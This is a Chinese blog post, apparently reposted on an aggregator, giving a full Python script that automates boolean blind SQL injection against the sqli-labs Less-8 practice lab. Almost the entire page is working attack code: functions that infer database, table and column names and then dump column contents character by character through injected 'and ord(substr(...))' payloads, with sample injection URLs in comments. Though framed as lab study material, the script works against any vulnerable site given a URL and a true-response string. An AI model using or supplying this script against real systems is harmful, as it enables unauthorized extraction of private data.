sql bool盲注
代码如下:
复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315# 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码 # 2. 爆破当前数据库长度 # 3. 定义数据库长度爆破函数Brute_length() # 4. 爆破当前数据库名称 # 5. 定义数据库名爆破函数Brute_database() # 6. 爆破所有数据库长度 # 7. 爆破所有数据库名称 # 8. 爆破表名 # 9. 定义表名爆破函数Brute_table() # 10. 爆破字段名 # 11. 定义字段爆破函数Brute_column() # 12. 爆破数据 # 13. 定义数据爆破函数data_dump() import requests import time import sys # 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码 DIS = True list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58] for i in range(97, 123): list.append(i) for i in range(64, 91): list.append(i) for i in range(33, 76): list.append(i) def sql_Inject(url, flag, display): global DIS DIS = display # 2. 爆破当前数据库长度 current_length = Brute_length(url, flag, current=True) print("当前数据库长度:", current_length) # 4. 爆破当前数据库名称 current_database_name = Brute_database(url, current_length, flag, current=True) print("当前数据库名称:", current_database_name) # 6. 爆破所有数据库长度 length = Brute_length(url, flag) print("数据库全长:", length) # 7. 爆破所有数据库名称 all_databases = input("Brute all the databases?[yes/no]: ") if all_databases == 'yes': database_name = Brute_database(url, length, flag) print("数据库名称:", database_name) # 8. 爆破表名 while True: choose_database = input("choose the database: ") table_name = Brute_table(url, choose_database, flag) print("数据库: %s" % choose_database) print("表: %s" % table_name) print('') next = input("continue brute the tables?[yes/no]: ") if next == "no": break # 10. 爆破字段名 while True: choose_database = input("choose the database: ") choose_table = input("choose the table: ") column_name = Brute_column(url, choose_database, choose_table, flag) print("表: %s.%s" % (choose_database, choose_table)) print("字段: %s" % column_name) print('') next = input("continue brute the columns?[yes/no]: ") if next == "no": break # 12. 爆破数据 while True: choose_database = input("choose the database: ") choose_table = input("choose the table: ") choose_column = input("choose the column: ") data = data_dump(url, choose_database, choose_table, choose_column, flag) print("字段: %s.%s.%s" % (choose_database, choose_table, choose_column)) print("数据: %s" % data) print('') next = input("continue dump the data?[yes/no]: ") if next == "no": break # 13. 定义数据爆破函数data_dump() def data_dump(url, database, table, column, flag): raw_url = url length = 1 jump = 10 data = "" # 首先判断数据长度 while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 --+ url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump += 10 else: jump -= 10 break while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 --+ url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length += 1 else: break data_length = length + jump # 爆破数据 for i in range(data_length): for ASCII in list: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44'--+ url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d --+" % (column, database, table, i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: data += chr(ASCII) break # time.sleep(5) return data # 11. 定义字段爆破函数Brute_column() def Brute_column(url, database, table, flag): raw_url = url length = 1 jump = 10 column_name = "" # 首先判断字段长度 while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'))>10 --+ url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump += 10 else: jump -= 10 break while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+ url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length += 1 else: break column_length = length + jump # 爆破字段名 for i in range(column_length): for ASCII in list: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1,1))='44'--+ url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d --+" % (database, table, i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: column_name += chr(ASCII) break # time.sleep(5) return column_name # 9. 定义表名爆破函数Brute_table() def Brute_table(url, database, flag): raw_url = url length = 1 jump = 10 table_name = "" # 首先判断表名长度 while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 --+ url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump) response = requests.get(url) if DIS: print(url) if flag in response.content: jump += 10 else: jump -= 10 break while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+ url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump + length) if DIS: print(url) response = requests.get(url) if flag in response.content: length += 1 else: break table_length = length + jump # 爆破表名 for i in range(table_length): for ASCII in list: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))='44'--+ url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d --+" % (database, i + 1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: table_name += chr(ASCII) break # time.sleep(5) return table_name # 5. 定义数据库名爆破函数Brute_database() def Brute_database(url, length, flag, current=False): raw_url = url database_name = "" # 2. 爆破当前数据库名称 if current: for i in range(length): for ASCII in range(97, 123): # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 --+ url = raw_url + "' and ord(substr(database(),%d,1))=%d --+" % (i+1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: database_name += chr(ASCII) break # time.sleep(5) return database_name # 爆破所有数据库名称 # ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97--+ else: for i in range(length): for ASCII in list: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44--+ url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d --+" % (i+1, ASCII) if DIS: print(url) response = requests.get(url) if flag in response.content: database_name += chr(ASCII) break # time.sleep(5) return database_name # 3. 定义数据库长度爆破函数Brute_length() def Brute_length(url, flag, current=False): length = 1 raw_url = url jump = 10 # 判断是否爆破当前数据库 if current: while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length(database())>1 --+ url = raw_url + "' and length(database())>%d --+" % length if DIS: print(url) response = requests.get(url) if flag in response.content: length += 1 else: break return length # 爆破所有数据库长度 else: while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 --+ url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % jump response = requests.get(url) if DIS: print(url) if flag in response.content: jump += 10 else: jump -= 10 break while True: # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 --+ url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % (jump+length) if DIS: print(url) response = requests.get(url) if flag in response.content: length += 1 else: break return (length+jump) if __name__ == "__main__": url = "http://192.168.11.101/sqli-labs/Less-8/?id=1" flag = b'You are in...........' display = False sql_Inject(url, flag, display)
运行效果:
最后
以上就是粗犷狗最近收集整理的关于sql-labs第八关python脚本的全部内容,更多相关sql-labs第八关python脚本内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复